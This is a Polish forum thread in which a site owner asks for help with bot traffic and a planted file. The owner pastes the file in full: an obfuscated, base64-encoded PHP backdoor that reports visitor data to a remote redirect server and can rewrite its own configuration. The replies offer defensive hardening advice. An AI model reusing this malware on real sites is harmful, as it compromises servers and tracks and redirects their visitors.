Atak botów na moją strone

[gucek012 0]

Witam,

Mam problem z botami na mojej stronie która nawet jeszcze nie wystartowała, otóż masowo tworzą mi się sesje i prawdopodobnie wysyłane są rządania do bazy. Dzisiaj zauważyłem również, że w głównym folderze stworzyły mi się same jeden pamiętam o nazwie diamond.php pliki o mniej więcej takiej zawartości. Jak w cytacie na dole. Czy ktoś mógłby mi pomóc ?

Serdecznie pozdrawiam

 

<?php $tds="

aHR0cDovL21vbmdvYWRtaW4ubmV0L2dvb2dsZWJvdC9zZWFyY2gucG9zdC5waHA="; $tdsip=""; $lin="aHR0cDovL3VuaWNlZi5vcmc=="; $esdid="s406"; $key="rHL0du8N79Y7brj5zR2n5mJDcXKfxDK7"; ?><?php //SEXTQE// ?><?php
$msxfcnyzez=strrev("edoced_46esab");$mvnpvzcmggfphbm="Ly9Db25mR3VpDQplcnJvcl9yZXBvcnRpbmcoMCk7DQppbmlfc2V0KCdkaXNwbGF5X2Vycm9ycycsIGZhbHNlKTsNCi8vIGdCXlhlMVk4NXd5aHpGTnVAbmVUS2c5dDkoV21LSFY0KU5AWnBWWF90NGUwYlplMkQpTktoMTJrdnFGUnBiKDJzUFR4djNuR1drZCNnXy0tMVdERzZCMWJ0dXJnNFBaREVzLSQzMypQcFpIUFl2VF8oQ2FOUy00dzczc21AQC1zM0Vzelk4LXAwN1BiYVgwLTgwblNWN0dyZSQoTVg4X0NBaGgocURNdjFNNjB5VXVzQHUxV3kuVSFFQCFZOEtVYlRfQTV5RTZaY3NTX3pWYVd4IWZGV0NEJHY0K3pXRVNxUWhNNFpidm11NTEzZSlkVE1ZQ0ZQVjlYc0tTWXoybSlzeFFOYlRWS3cxdlU5RHVHdCFSVnE9UkZQVnJzZ056TnA0KlRXI0RycURjaClnaDcjSC5FQXVydUcoMlB3dTdtNGU1WipjOUQjc1MwMiRXZmM1cGRYQ19SQFFhbUFlLjYkbTApYUBGLlpAcndYKG1UUzVQYm5AVlQpcXVjZVpAZ3U4VDgyKWV1YWI5TUZXUkIpNmV2Rnh3Uy0tUkN6djNUc2haVVVCKWhBNjRDPT11c2Mka3A5YmZDeF4rc0BhY2N6dVlrZkNRemIyQ185V3Z1KS1QUWc9VWEwRFMpcUs0R05nYXlUNUNHc1p0REF1cWYzNTIkMHEuTkQ2bg0KJG1vZGU9JF9HRVRbIm1vZGUiXTsNCmlmKCRtb2RlPT0iY29uZmlnIiBBTkQgJGtleT09JF9HRVRbJ2tleSddKXsNCmVjaG8gJzxmb3JtIG5hbWU9ImZvcm0xIiBtZXRob2Q9InBvc3QiIGFjdGlvbj1odHRwOi8vJy4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1NDUklQVF9OQU1FJ10uJz9tb2RlPXNldGNvbmZpZyZrZXk9Jy4kX0dFVFsna2V5J10uJz4NCjx0YWJsZSBib3JkZXI9IjAiPjx0cj48dGQ+VERTPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9InB0ZHMiIHZhbHVlPSInLmJhc2U2NF9kZWNvZGUoJHRkcykuJyI+PC90ZD48dGQ+VERTIElQPC90ZD4NCjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icHRkc2lwIiB2YWx1ZT0iJy4kdGRzaXAuJyI+PC90ZD48dGQ+S0VZPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSInLiRrZXkuJyI+PC90ZD4NCjwvdHI+PHRyPjx0ZD5SZXNlcnZlPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9InB0byIgdmFsdWU9IicuYmFzZTY0X2RlY29kZSgkbGluKS4nIj48L3RkPjx0ZD5FU0QgSUQ8L3RkPjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icGVzZGlkIiB2YWx1ZT0iJy4kZXNkaWQuJyI+PC90ZD4NCjx0ZCBjb2xzcGFuPSIyIj48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJTdWJtaXQiIHZhbHVlPSJvayI+PC90ZD48L3RyPjwvdGFibGU+PC9mb3JtPic7DQpkaWUoKTsNCn0NCi8vIDJWMkhXd1gkKUZudFJUbnBna3JfZCshVihoWUBHbUdNcnZGMnQ4QENAR3peWk5TIT03aDFHU2ZzRER0a3U9ZmsudG5acl45R1F1TS1lXjApa1U2MjRoNVVAdzdCVzJfRlRDeGJEPTVuZWJmdVYpZ3RzUHA1Q3dBZ0IpS3krcjUjZF9ILUFISDRYYm4xbl8hcSEwIzFObkF2Vmg2LjJ0X21yOS05YS0tcmVScCNSdUhXSF9UPShXIXZXbnl2K3d0d19SWHkwa0ZYOWI1MGNjUkFDUlRfQUckI2QydzFEYSlAMFN0WWU1UDg3aCszeD0ybl5Qa3I2RzZ6Ryp1V0BrUSpLMDUtbTJuNkM3c0tBenN6N1dIUF9hM3hhcFBOZ0teSFUpMi1zIXAhY3N0MSpfczM5Kyk4U3JXcXB5cXZaNmFiOXZYMllDbnlmOXNkKTlVVChrODVxd3EpIVUuNHk2VEREMy0oOEE0REAqYVJUU0BIMHQtcWgjRzVNIWg9UCpzcFQoOHlENDBFZSlCcld2ZVl2WGR6RGtAUTk1MHA3RDlVRTd4Xyk9c2E9dXZSQFdEZ3V0YyNWQkFxSzNDTVJCbkY1RHJaY1EyMlood3pyRjRhZVUhZmUtOXooVzFQR0M0QTB3K1kwTU4wczNyIVBDdWtrSDFFYlBVVz1BJFcrdzRQMnlWKHErMWYrd3JTYnBNI0Vecy5lNylDbUhyZSNrZCRiQkNSNkAxNW0xI3VWZCpYOWYjbVNVMXJLNzkrVlcqQUVZNXooQVZzR0dtY1pAeFk2WmVWVFRUQi5aK0hHMUdwZGN6USpTMF9QLj0oenRANnM4UHhaemdTM3owUSlkZF5RMDh6ZnJYQChXVjZ0ZjQqXnRTWVNDaz1SY1VrXipIY3RIR2s4cjUocUtrdi5HWS5aNWFud0NmRio9RjFNN1VfZ3REOGZlWTMhcDNBKWh3emEtS04jdSR0K3EhLTZUNHpUZVdNXl9RYSFZaC41K1VzeV8hTlBtXmdwVjl5NjgyYjZORVdfKiFkeHBNRG0qRzZGI19RZWFWQHJmMjQ2RGZRdlBFNVgrbnZTZnVHTnZASEZ2ZmtoNlkqaG0hPUN5NVZGdUNyVm5yOD1yc2UpYW4tJDZLcWg0ZD0NCmlmKCRtb2RlPT0ic2V0Y29uZmlnIiBBTkQgJGtleT09JF9HRVRbJ2tleSddKXsNCiRzbj1leHBsb2RlKCIvIiwgJF9TRVJWRVJbJ1NDUklQVF9OQU1FJ10pOw0KZm9yZWFjaCgkc24gYXMgJHNubil7JHNjcj0kc25uO30NCiRnZXRscGE9ZmlsZSgkc2NyKTsNCiRzdHJuZz0kZ2V0bHBhWzBdOw0KJGZpbGU9ZmlsZSgkc2NyKTsgDQpmb3IoJGk9MDskaTxzaXplb2YoJGZpbGUpOyRpKyspDQppZigkaT09MCkgew0KJGthPScnLmJhc2U2NF9kZWNvZGUoJ1BEOXdhSEE9JykuJyAvL1NFWCc7DQoka2FrYT0ka2EuJ1RRRS8vICcuYmFzZTY0X2RlY29kZSgnUHo0PScpLicnOw0KJGZlbHAgPSBleHBsb2RlKCRrYWthLCAkZmlsZVskaV0pOw0KJGZpbGVbJGldPScnLmJhc2U2NF9kZWNvZGUoJ1BEOXdhSEE9JykuJyAkdGRzPSInLmJhc2U2NF9lbmNvZGUoJF9QT1NUWyJwdGRzIl0pLiciOyAkdGRzaXA9IicuJF9QT1NUWyJwdGRzaXAiXS4nIjsgJGxpbj0iJy5iYXNlNjRfZW5jb2RlKCRfUE9TVFsicHRvIl0pLiciOyAkZXNkaWQ9IicuJF9QT1NUWyJwZXNkaWQiXS4nIjsgJGtleT0iJy4kX1BPU1RbInBrZXkiXS4nIjsgJy5iYXNlNjRfZGVjb2RlKCdQejQ9JykuJycuJGtha2EuJGZlbHBbMV07DQp9DQokZnA9Zm9wZW4oJHNjciwidyIpOyANCmZwdXRzKCRmcCxpbXBsb2RlKCIiLCRmaWxlKSk7DQpmY2xvc2UoJGZwKTsNCn0NCi8vIG41TWYwU1pLKFJUNFMkTkF4YzBCdEg2dFJ0SFJncDYwcFhrQ1hDKXhQUjhVYTQ4aHZYX2I9UjhTcSFLTjZ4ejR6SCE9WXg3KmFuaHZCR1VwdFE3WEguY3UoKVBrRit0R1RFS0gjTUREdjdWa0VtWVE3ZngxeEswYWVmMTU9bjVyIUMxNF9eTWZHNFZDY1hGeFQzKndoVilRdCNudWUteCohTTRkdnY1WXo4QXUrdGQrMUF3a2R5bTJVdStzX2J0c1QqWTV0Y1Z4UWZTVmREWjlTTk1oMC49Tk5zX1Nic2tNV0A4aEdVY3c9NG5uPVlQeWJOMStAOTFWdCgrK1p1KXQoeV5iUThUY0QpMnBAI1RjcW54MVZNQEMpWnQ2Y2ZALT1zZSRncm1GWDlwOEY9XnBlVSpUJEc9c0drdDdRYVQqYW0xWTQqNDcwV2JQTSh1QWZFUnFoeTFSci1NNSokMUtfJFREVDZZWUBUc0RVTlUyblo0RkMxNm5hbS1LUG54KClYWkZ1JClwWEN1SE5NTjJyKV8qNkMrMDhtJHp1Nkc3Nm5xYldZKEFEaFFeV2dhR2Z0YmM3Y25HbVFiU3YjX1M0a1QjV1BhXjNUI2JhVlpGVms1WD0wUyhBTlhzUUEoMlkrZUZlY1JUczJEOFU2MXQwWHg0V2Q4JGc5NEFHY0hWU1lCPXNOdjAkaFcodEVtNSMxUiE9cFJBKHljKVEpazc3REByOXBzWldBQmgjLTVaaDNERWUkYWE2XlJwVEFhNU1Ecm4oPW***Wc0Zzl1NndyOC00KUFlX1BLTUJYRjRVMFQhcktfV0YtUEhhR2REZ01WOF9QJEQzWjRidkQkeHE2U3o3d0BaelJGR212cmF0RUtUcUQubWdYMjVlTjMuZ0dmITVtUUdfQkBiZ1NYKnR6LnJAYVFGUCsyYSRFWWtAaEJfQWVuNlc0ME40TUZVcHYrKFhHejJHU3NeKCMueVdSYXguNzhTUXUzVWZ0aEtQIzNWIS5UcDktRVVHWnZRUlohQkVmZnAodVl3Z2FLOE56YiFRLVEpdEhhLl5tLXNNbU5LRm1ONXFjaDRTQTRlQ1JRQ0MwWGg2LWRUPVk0UEQ1RmFhNDM2Z3Z5WkNQKURnYVN3KUROeXpVWSNUKDYuQkBIcUgwbiopeGF3JDZmKjVtWXpScEBFYXMxNmhCVVBYemtRTmRFMkV0ZlFDLlF3IXgqKThzcUIjZjE9NFMkelZ1S0FOKmZudjY3SA0KLy9zZW5kDQppZihlbXB0eSgkdGRzaXApKSB7JGRvbSA9IGV4cGxvZGUoIi8iLCBiYXNlNjRfZGVjb2RlKCR0ZHMpKTsgJGRvbT0kZG9tWzJdO30gZWxzZSB7JGRvbT0kdGRzaXA7fQ0KJGZwID0gZnNvY2tvcGVuKCRkb20sIDgwLCAkZXJybm8sICRlcnJzdHIsIDMwKTsNCkBzdHJlYW1fc2V0X3RpbWVvdXQoJGZwLCAzMCk7DQovLyAwY3V1TSNkMEdteFJnd2VYbU5uQU52S0E4ITU1ZkVTXk5jUyNkbkN2bnUjQ2VnK2YhMjQyY2g1MWJELkNDSFBrKEhTKkM3NDBFYWZtOUYhSGQyU212TS0uQnVYYjUtNyt0Rl5Vel9eNSFOeVVGdV96UWVncF9meUh0aHI9TTBWKkVAdXhQaCRzIVJZYl9edjFBZTFTVy5xUVNNYS4uYy4hYkZWMDJzS003NCp6RnNRNkdSX2E0emhSYStZYm40RitINDNWbW4kcmRiMFFOIW4udFRCQUNoa3JYeEZQNiQzN1F2QjFIa0B3elRGS045WFpYVDRXVHFQUT1aU3AtMSgqKEdGaGReRV4pUUctY0Y2TXEwcSt4QyE3TnIqcFZFKjQ5VWNhXzdtJDBSRlVjdHBVRzc2c1h3MEdUKUI2enhGUzZxYUZwX2deMiN6JEhAeWZEdytEMS1wZzAjNm0wXjdIQkdHYyNYM005MVEyJFoqKGREITZDVEVFSE1eLVdaZjV3RnUwQFkxdnYhQC55ITV1QmNaa0h4N1NGMTghNChYVT0qWHBxeC1YOSlEbTRhR0doNmd5V1NwNlBOUT16NDFOVG4yQFZrM3dlRl53QyFIMGNIMSplUCE0bXJuNkNZKW5wZiFUUFFkS0MtWmtaNSRnX20zZHUrTjhNSFNrREBhWVQ0WihFcTg9YSFOVz1ebUheLmItQ011bVN1N2VGNFhCJHlQemMjQENCLVV4RzheRW5tUkMyIUdCWWhkdk1iKkNwOFZLKDFWKnlmUVRFYXg3Wlp5I1E4bkJuV01kMnpFYXRILmR2RV4pREIpdWNRWXkubmNlbkVWR2NCLmIqV1IqZGZBWFdjZmhtQ0FFTl5QTTRWRDhWN1EjWnRjKGN4S2NWR3poZD1IMlF1aHV1MTF1R2MjdWtYdURkKENwOGYzMT1YWUUxLnlwTiRadlMjNV9LZTh5a2QkYlFZSHRtRkUwcDB5TSQ0KXV2ZSF2M3hCMkY4KlcxViRtekhaUFJWQTdfOGJ0ZnQ9SF5zIWNyeUtFbil2Q05ySC5QNihoMjR3OA0KaWYgKCEkZnApIHskZ290bz1iYXNlNjRfZGVjb2RlKCRsaW4pO30NCmVsc2Ugew0KJHRfZG9tPXVybGVuY29kZSgnaHR0cDovLycuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydTQ1JJUFRfTkFNRSddKTsNCiR0X3JlZj11cmxlbmNvZGUoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSk7DQokdF9pcD11cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pOw0KJHRfcHJveD0nbm8nO2lmKCRfU0VSVkVSWyJIVFRQX1hfRk9SV0FSREVEX0ZPUiJdKXskdF9wcm94PSd5ZXMnO30NCiR0X2FnZW50PXVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pOw0KLy8gMkJHWmVeeGJuR1hSVk5SQFF4IWM4X0hlY2UtKCFNNGdzd3hOZ3gpRlhXdXVAVlViNV9AcSlmR3orNXh6aFF3ZjNXZkdmZlIxVXNBWGFxWCsqPVYuLUJTIVJhUDA5cTdyI3hYblRTJF43djg5MC44KGdRIzREX2J3SHohTS1LckhzKSRjNWhNd2tiMkY1blhiTkJFNmY3Y240WCFtPTRAVDVoIXMkZD1yWnB3c01OVEhkQTRUUzZFN3BnOWV2VCNrdSpobiM1dGV0PUZRNWRhQHNZRFoxKzMteksqcHVYNS1tcXhjYzA3S2NXcm53I0EkaHpoU2tfQmN2JHVodl9RbTdWQjhSMzZ6dXQqXmZuSzFEUVQ5QTRoKS54UkhZMXZOMEExUyFaTXc4MiE2d1NBWmFaMCtVPXhnZ1kzWHRUWEQjaz11JEQ0Kj1HIVdkRDdiN0dudF50dlR1QGRuKjEta0JLTXdZQFdDWEhWKGskQXdCTXojXzEqVERnbV9hOHN6NjIrQHI1UVRVI3E5TmRlNWJuck5wI1lSTTlnUyhNel8hTlk2WWcwSDRnUSEwZkVibnRWRl5AdDY2NU5VJFQzQ184ZGctKkJwVEBjMCMpYkJGOHJ5Q25eTmUhRnNzXyNVUm0hNigpMiFediFQV0JwUVEoa3NfaEVRWTFNIXZLLSMpVHBjZWVId3hUI25HKyRYVDRRem0ucHFONEE3a3VRM2MyUl5hV1JwQU1BdVk3a3MrQ20tTThEdk4oZypNKFIuTnUtK0F6Z2QyUlF4WGFCRXQzPV4hQV5hOXZHZi02UyE9NCl6KTgpKVhoZ2NScDRNcWUyMWEjME0paGJQcXdXeS4ocERreHctMUh2N010bTg3M1lwJDAod3RQKypIbUcoVTB1MF9TbVBQa1Y4UW40NUVTLipAbU55WV41ckd4IUZodl9kdyloY1k5RzZwKSghZDhzYm5rREhYLVQucFFuZVNVUkteNykwKURDZUc4blROKzFRblVuRV8tVHRBQVV6SA0KLy9mb3JlYWNoKCRfQ09PS0lFIGFzICRrZXk9PiR2YWwpIHskdF9jb29raWU9JHRfY29va2llLiImIi4ka2V5LiI9Ii4kdmFsO30NCi8vJHRfY29va2llPXVybGVuY29kZSgkdF9jb29raWUpOw0KaWYoIWVtcHR5KCRfU0VSVkVSWydRVUVSWV9TVFJJTkcnXSkpIHskdF9jb29raWU9dXJsZW5jb2RlKCRfU0VSVkVSWydRVUVSWV9TVFJJTkcnXSk7fQ0KZWxzZSBpZighZW1wdHkoJF9TRVJWRVJbJ1BBVEhfSU5GTyddKSkgeyR0X2Nvb2tpZT11cmxlbmNvZGUoJF9TRVJWRVJbJ1BBVEhfSU5GTyddKTt9DQplbHNlIHsgJHRfY29va2llPScnOyB9DQokb3V0ID0gIkdFVCAiLmJhc2U2NF9kZWNvZGUoJHRkcykuIj9kb209Ii4kdF9kb20uIiZyZWY9Ii4kdF9yZWYuIiZpcD0iLiR0X2lwLiImcHJveD0iLiR0X3Byb3guIiZhZ2VudD0iLiR0X2FnZW50LiImY29va2llPSIuJHRfY29va2llLiImZXNkaWQ9Ii4kZXNkaWQuIiBIVFRQLzEuMFxyXG4iOw0KJG91dCAuPSAiSG9zdDogIi4kZG9tLiJcclxuIjsNCiRvdXQgLj0gIkNvbm5lY3Rpb246IENsb3NlXHJcblxyXG4iOw0KZndyaXRlKCRmcCwgJG91dCk7DQp3aGlsZSAoIWZlb2YoJGZwKSkgew0KJHN0cj1mZ2V0cygkZnAsMTI4KTsNCmlmICgkc3RyPT0iXHJcbiIgJiYgZW1wdHkoJGhlKSkgeyAkaGUgPSAnZG8nOyB9DQppZiAoJGhlPT0nZG8nKSB7ICRnb3RvLj0kc3RyOyB9DQp9DQpmY2xvc2UgKCRmcCk7DQokZ290bz1zdWJzdHIoJGdvdG8sIDIpOw0KfQ0KLy8gMzkzaCpRQm1jZl8yZ3cxNnZadnghV0BkdlpANHRBPVIyV2sjNHp3Rms2VnA0Lm5CU3BuQD0xRVkhNFJCJG1RaE4jZ0QpWTEoI1MqY0AtVE00dVZTK3I3bmMqaHdBTjdVMFRBUWZtSFIxaFkoLj1iK3NNOWY9cWZLS14hRUR0Yk5QYWZtaCs9ZzUrZVotLmtQNEh2Q2dQMG5XQ0MyQDNBRi1uYVF5K1UzS2ReaF5NZEdmMEhFTkZ6DQokZ290b2UgPSBleHBsb2RlKCI6Ly8iLCB0cmltKCRnb3RvKSk7DQppZigkZ290b2VbMF09PSdodHRwJyB8fCAkZ290b2VbMF09PSdodHRwcycpIHsgaGVhZGVyKCdIVFRQLzEuMSAzMDIgRm91bmQnKTsgaGVhZGVyKCdMb2NhdGlvbjogJy50cmltKCRnb3RvKSk7IH0NCmlmKCRnb3RvZVswXT09J2Nvb2snKSB7ICRnb3RvZWU9ZXhwbG9kZSgiJiIsICRnb3RvZVsxXSk7IGZvcmVhY2goJGdvdG9lZSBhcyAkc2V0Y29vaykgeyAkc2V0PWV4cGxvZGUoIj0iLCAkc2V0Y29vayk7c2V0Y29va2llKCRzZXRbMF0sICRzZXRbMV0pOyB9IH0NCmlmKCRnb3RvZVswXT09J2VjaG8nKSB7IGVjaG8gJGdvdG9lWzFdOyB9DQovLyAjQ0FjZ3BDJEI3JDlNKDIocHcjI3dHSHZ1Ryo5bUtwOFlEcXZxUXM5UGZfenQoLlUha3NLLkJtUDFFM3A3YlhhYWNXPXJ2UGJIeTg9NWQheFBxIU1OUHVHcmR3cjdCRiMrV3VTQFdxcXZhaDFrLWROMl5fNHNEQ2Q3TVhIN155KHZNbTlQd2RTM3BUckJIUE50dlFZPXRkMVJiSDgkPUdaOGZaQnFALjNVQHRQbndEMD1XJEFiVjdmeVV1eSNjY3JiM01mMXlFMFJSI2NiTXVGR3dkNGRXPUdEZnpEZWYtejJaRVNLbjNGLkRCdWdeUUtjZE5XMHhkR1EhcFJ3NTBFdFY0WGJFS0QpNE03YyFZUjdXPWIhZHBnRl85JHplcDFrZ15lR3pNRFFnUmdZZEhUWW5wQmY4X2gjY3BhMWY2ITVEUmYtNyNOcUAuRFJmUDBaRmhxdFQrVzU3KEFtYnJ6Qkg0MnhiZW1iX0UudChQdFFzVTg9MGsqbUFVVkZuOHEwZEdyWSFlZGcrWFA5ejl5UFg9KChaZUUtMmNIN3N1Uk4ha3JCIyEjKCtVJEd6SFVVXlcoZ1htTVRaUFNuaE1CLWFoQiRnUWtTWWVOZkE9S1FEaG0rZ0VkWEF4K2VoOSMocDZSbnBeQzQuNCl2UnltKmJHOGJGVWQtVXFIRTc4MTM3RXhSV0hNWVFiKiRjUVpediN3Qk1wUTZEKSNadlh0UFUxQ1F5MDBIZzBlVlJaNXJoVWVSI3d4QSl3RWM4TjRBNWZlemhrMWdrVz1eOWRmX2s4Uy5jQSFVM14wQkBacC0qV1BAKS5ZYXZec1d2QEZeemtnOTVDMzFeNG5ZMjVna3pna153VnkoZipOMShtZTRxR3QjZythdjZRbUBfITdBQG53QW4jbUN6TS5FXzU0VDBBeVV1Tk5ncTcyY0IxLTdYYmI3eHQwLXNnI2RBeUVZd3pHMG16RGtoNlVRbkQhKmdrbUUtIzlUZnVANjQ9cyE9dWVVZS0ySFRlLVdhWCtXRWhidFlBWUFnNV8=";eval($msxfcnyzez($mvnpvzcmggfphbm));
?>

 

[GyniO 10]

1. Zmień hasło FTP

2. Jaki CMS (joomla, WP)?

3. Będziesz musiał pozabezpieczać wszystkie formularze, robot dostał się w 99% przez jakąś dziurę w formularzu ( szablon lub plugin )

Edytowano Lipiec 1, 2015 przez GyniO (zobacz historię edycji)

[gucek012 0]

Mój własny kod, hasło już zmieniłem, posprawdzam te formularze. Pewnie pasowało by pododawać addslashe ?

[Gość patrys]

Jeżeli to Twój serwer to oprócz haseł możesz dodać do PHP suhosina z clamav i do Apache mod_security.

Powinno trochę pomóc na przyszłość.

[GyniO 10]

Jeżeli masz mysql_query:

 

Przy update/insert zabezpiecz pola dodając np mysql_real_escape_string()

Jeżeli masz upload plików - zabezpiecz sprawdzając co to za typ pliku

[protoplasta 25]

Nie wrzucałeś przypadkiem jakiś nulledów na serwer? Bo też może być że przez coś takiego ktoś się dostał.

[Gość Rafiki]

To wirus. Dostał sie prawdopodobnie przez Twojego klienta FTP jeśli zapisujesz hasła i twój komputer był zainfekowany albo przez nieaktualne / niezabezpieczone skrypty php.

Jeśli masz Wordpressa lub joomle to na 90% ich wina - brak aktualizacji softu i wtyczek.

 

Jeśli masz autorski skrypt - moze uzywać starej wersji TinyMCE ? tymbardziej jeśli z pluginem do uploadu zdjęć - jest on bardzo dziurawy.

Co do reszty nie wiem jak masz napisany skrypt ale programując najważniejsza jest logika działania (aby system był przemyślany) no i oczywiście filtrowanie danych które wchodzą ( dodanie jedynie mysql_real_escape_string - to i tak słabe zabezpieczenie ).

 

Aby usunąc to świnstwo musisz usunąc cały kod .php pododawany przez tego wirusa w rózne pliki .php (najczęściej modyfikuje on index.php i dodaje mnóstwo swoich plików .php - jeśli masz dostęp do ssh wyświetl sobie ostatnio edytowane pliki - najprawdopobniej pojawią się te które pozmieniał żlośliwy soft jesli sam nie edytowałeś zbyt wielu plików).

Możesz wyłączyć w php.ini funkcje eval() i to też powinno pomóc

Edytowano Lipiec 1, 2015 przez Rafiki (zobacz historię edycji)

[siebek 4]

Możesz wyłączyć w php.ini funkcje eval() i to też powinno pomóc

W php.ini chyba nie za bardzo da się to zrobić bo eval() to nie funkcja

[Łukasz Ostrowski 593]

bo eval() to nie funkcja

A co to jest? Klasa?

[PapaSmerf 497]

A co to jest? Klasa?

 

Instrukcja (language construct), ale nie funkcja.

 

http://php.net/manual/en/function.eval.php

 

 

Note: Because this is a language construct and not a function, it cannot be called using variable functions.

 

[Łukasz Ostrowski 593]

Zwracam honor.

[Gość Rafiki]

Rzeczywiście, eval technicznie to nie funkcja ... w wielu artykułach można przeczytać ,że da sie wyłączyć przez php.ini przez disabled_functions ale w takim razie najprawdopobniej nie zadziała to rozwiązanie .... a dotychczas sam je stosowałem heh

 

Po poszperaniu troche w necie ... dowiedziałem ,że się da ale trzeba doinstalować suhosin, jak kogos interesuje więcej na ten temat : http://blog.securityinnovation.com/blog/2013/10/php-security-configuring-the-phpini-file-properly.html

[gucek012 0]

Dzięki za odpowiedzi, narazie jeszcze nic nie wykryłem, ale zobaczymy co będzie dalej.